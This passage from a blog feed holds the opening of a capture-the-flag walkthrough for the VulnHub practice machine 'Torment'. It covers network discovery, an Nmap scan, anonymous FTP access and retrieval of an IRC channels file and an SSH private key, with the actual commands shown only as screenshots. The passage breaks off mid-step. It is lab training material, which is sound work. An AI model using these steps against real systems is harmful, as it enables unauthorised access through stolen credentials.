style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/5616665917280090043'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/5616665917280090043'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/01/mercy-v2.html' title='Mercy v2'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhX4hVrx0fZRLYGqY3v96DkPyIyZiUYaMwu0wDMUnAhTh9PFG8uuc5bLRRxhmI7mZnUWe7OxQDByaPdmdCPPf7ibZpPcSEgwx-KgyEmN2qD9qFLWg2K1XsvnOChHgzWedaoQm4DXZhrbT1/s72-c/screenshot.53.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-812421108203060996</id><published>2022-01-03T13:12:00.001-06:00</published><updated>2022-01-05T09:10:52.709-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Torment</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;TORMENT&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_H6O0vb5pgJD5CftB8s2EfyolmeRmq12IkT5C8s_aTzEI7v9bOZ5EoCFpyTHFl4I4nvRHff5riXfPuYcMOr_QzCLaXF2WjeHLsWO6fr1mxwKUxATWVO5hBtdYbRAZy4pAqlX-vsSUalnq/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;238&quot; data-original-width=&quot;683&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_H6O0vb5pgJD5CftB8s2EfyolmeRmq12IkT5C8s_aTzEI7v9bOZ5EoCFpyTHFl4I4nvRHff5riXfPuYcMOr_QzCLaXF2WjeHLsWO6fr1mxwKUxATWVO5hBtdYbRAZy4pAqlX-vsSUalnq/s16000/screenshot.67.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine&amp;nbsp;&lt;b&gt;Torment&lt;/b&gt;&amp;nbsp;from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p style=&quot;background-color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- &lt;b&gt;Torment&lt;/b&gt;&amp;nbsp;can be downloaded from here:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #1177cc; font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/digitalworldlocal-torment,299/&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Once downloaded&amp;nbsp;&lt;b&gt;Torment&lt;/b&gt;&amp;nbsp;and extracted with VMware:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge2MZlH6rkM93aYAayX0kMcqX_Rn3iuJnjBFAWrPFd7pZv9nrrEDfkTuHqVLu-vxS69PZQPIoQ2IV3o5Fr-HyKAnUfogeMm4L6-e3OAThnVz2Ac4QRkPNNz-90WgavDsAXvudirQHSwmIz/&quot; style=&quot;background-color: transparent; clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;363&quot; data-original-width=&quot;489&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge2MZlH6rkM93aYAayX0kMcqX_Rn3iuJnjBFAWrPFd7pZv9nrrEDfkTuHqVLu-vxS69PZQPIoQ2IV3o5Fr-HyKAnUfogeMm4L6-e3OAThnVz2Ac4QRkPNNz-90WgavDsAXvudirQHSwmIz/s16000/screenshot.64.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;- netdiscover helps to identify &lt;b&gt;Torment&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;&#39;s IP 192.168.1.24:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGBOn96-6LdE6HGmS1RjCAkXPJezoY365oTAz0ORjic9hBrqhPmhYPQH6Y_x5N9tJe49bVEJiAJeiFq-KPjW-BpvRTrPVEsEdXs-9lfYzFHhhZ2WN6uJNrZC78wPESbCekQJ2smbHHf7UI/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;369&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGBOn96-6LdE6HGmS1RjCAkXPJezoY365oTAz0ORjic9hBrqhPmhYPQH6Y_x5N9tJe49bVEJiAJeiFq-KPjW-BpvRTrPVEsEdXs-9lfYzFHhhZ2WN6uJNrZC78wPESbCekQJ2smbHHf7UI/s16000/screenshot.54.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8Tlkp82rNI4oQ3Qqb5dihp4n5c__nahVTaihJ8GyKawv-CO9WJSJcjLsFt7CPFcDUwvLo3fUitKJv-cmZehoQXPM1_Tj-YAmWr-4QWkuqAA05Qx79kWbK9ai5MDvPDjv2b-HJIhmCzZv/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;231&quot; data-original-width=&quot;841&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8Tlkp82rNI4oQ3Qqb5dihp4n5c__nahVTaihJ8GyKawv-CO9WJSJcjLsFt7CPFcDUwvLo3fUitKJv-cmZehoQXPM1_Tj-YAmWr-4QWkuqAA05Qx79kWbK9ai5MDvPDjv2b-HJIhmCzZv/s16000/screenshot.55.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap we see a lot of open ports:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN5zJFKEx9cvGIvqAOTVx1XMsHB92q_2xZ5Ir7fh47lRrRXqovFRdX6196PIj5w-Bgt8CKGA3Rs8m9C7PTX0idFCsvSl2JLa0Zmpet6fq1rtrJRTjQpuanaljRSvD4euxV3r-vo4EgpQjZ/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;469&quot; data-original-width=&quot;437&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN5zJFKEx9cvGIvqAOTVx1XMsHB92q_2xZ5Ir7fh47lRrRXqovFRdX6196PIj5w-Bgt8CKGA3Rs8m9C7PTX0idFCsvSl2JLa0Zmpet6fq1rtrJRTjQpuanaljRSvD4euxV3r-vo4EgpQjZ/s16000/screenshot.56.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Going deeper with port 21 there is an Anonymous FTP server:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9wU3r9R1uDzPHHO-bjlw4rr6QM_NBd-Ab-IWgtcbp3VXI18pi1HwAbdYnQj_D-TV7JtG_YbsBTz8cRCin_knNsaQ_Ccj5Sxl-HaZc6lhDtcGLUh30xHAl30Div-TXndR4uelcId1XfSh2/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;210&quot; data-original-width=&quot;706&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9wU3r9R1uDzPHHO-bjlw4rr6QM_NBd-Ab-IWgtcbp3VXI18pi1HwAbdYnQj_D-TV7JtG_YbsBTz8cRCin_knNsaQ_Ccj5Sxl-HaZc6lhDtcGLUh30xHAl30Div-TXndR4uelcId1XfSh2/s16000/screenshot.57.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to the FTP server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3DWgyK995m-Bu_vl7acu0UkelvpDgZuMcl7CRMd9EjYuliCW18gykbW02dAm9oX0poWHkvc38J0P-n5k83b1cQzYLdhlO1q57wy26SGXIlUJBeD9lFVtjBIAm2xtmeMehAOD38L6EUQI/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;256&quot; data-original-width=&quot;425&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3DWgyK995m-Bu_vl7acu0UkelvpDgZuMcl7CRMd9EjYuliCW18gykbW02dAm9oX0poWHkvc38J0P-n5k83b1cQzYLdhlO1q57wy26SGXIlUJBeD9lFVtjBIAm2xtmeMehAOD38L6EUQI/s16000/screenshot.58.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for content, there are some hidden interesting directories:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsM1L7H2lBfrtqeugjzOB0uiMuroqVIAAgw1M8FTzl9PsMqEQ_Aopmmw-QBl12wwnD5EvI4WdpQwnXOKo4mB94VqhwkrRRTYaCZYloOcZ7tHqLtnwviMe758S5ULC_63xzQnwtQ2ewNSJU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;325&quot; data-original-width=&quot;698&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsM1L7H2lBfrtqeugjzOB0uiMuroqVIAAgw1M8FTzl9PsMqEQ_Aopmmw-QBl12wwnD5EvI4WdpQwnXOKo4mB94VqhwkrRRTYaCZYloOcZ7tHqLtnwviMe758S5ULC_63xzQnwtQ2ewNSJU/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Most of the directories are empty, with the exception of &lt;b&gt;.ngircd&lt;/b&gt; and &lt;b&gt;.ssh.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting &lt;b&gt;channels&lt;/b&gt; from &lt;b&gt;.ngircd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3TApFzTAPY-zIrgZ0RycGAiY1pN7HVhpINmTgjGkitnqwZA2P5o09k-gSC4qNaCKaV5NAsPnpvDKf982KNUJkHQkRvyLrYO4nYyqOOjAsaOi0iBsp_mj-uvOdT94emOe2XikqsvVVowvz/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;347&quot; data-original-width=&quot;734&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3TApFzTAPY-zIrgZ0RycGAiY1pN7HVhpINmTgjGkitnqwZA2P5o09k-gSC4qNaCKaV5NAsPnpvDKf982KNUJkHQkRvyLrYO4nYyqOOjAsaOi0iBsp_mj-uvOdT94emOe2XikqsvVVowvz/s16000/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting &lt;b&gt;id_rsa&lt;/b&gt; from &lt;b&gt;.ssh&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNvJYubhY_GzCU_Cp0UDine-4E9d7d_XnvcUI_-6rReY6_H7pJTHbuxSJN7ITCVEwudx5Yrg7w7rAj63OevGkF-ZcnaeOqM69fTXJhv6mQ2p9v9gFwqskZhJL3ubwNQI18sDIvY8NcinE/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;347&quot; data-original-width=&quot;719&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNvJYubhY_GzCU_Cp0UDine-4E9d7d_XnvcUI_-6rReY6_H7pJTHbuxSJN7ITCVEwudx5Yrg7w7rAj63OevGkF-ZcnaeOqM69fTXJhv6mQ2p9v9gFwqskZhJL3ubwNQI18sDIvY8NcinE/s16000/screenshot.22.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transfers are successful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimtdGDk4PUgSiSmC0QWfBohzD3K5tUXMLsPac6S0M-iOj6_tKIUBKluFYedspjPRYUVsYXNElSUqeO-I2j4lpTo7Tm3Sc1rK9Wis9scQheovs9jlxeF8th-UQLVCL4XJMpGnFLGPLPycD3/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;164&quot; data-original-width=&quot;568&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimtdGDk4PUgSiSmC0QWfBohzD3K5tUXMLsPac6S0M-iOj6_tKIUBKluFYedspjPRYUVsYXNElSUqeO-I2j4lpTo7Tm3Sc1rK9Wis9scQheovs9jlxeF8th-UQLVCL4XJMpGnFLGPLPycD3/s16000/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;channels&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3UiIrwzuznhiQa_w8e1B7IsFyiH4kNl1WzMtAgyMB3GAU7sCZZpZU_XGaSwr3AwnweyxFg_o7GXt26pVvIcMbEZ_Dd4FxT-D1jFL4bvhoxgD7Vode5_tgylcQkOpcypSJASH4MnJp9_Lq/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;114&quot; data-original-width=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3UiIrwzuznhiQa_w8e1B7IsFyiH4kNl1WzMtAgyMB3GAU7sCZZpZU_XGaSwr3AwnweyxFg_o7GXt26pVvIcMbEZ_Dd4FxT-D1jFL4bvhoxgD7Vode5_tgylcQkOpcypSJASH4MnJp9_Lq/s16000/screenshot.24.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;id_rsa&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a 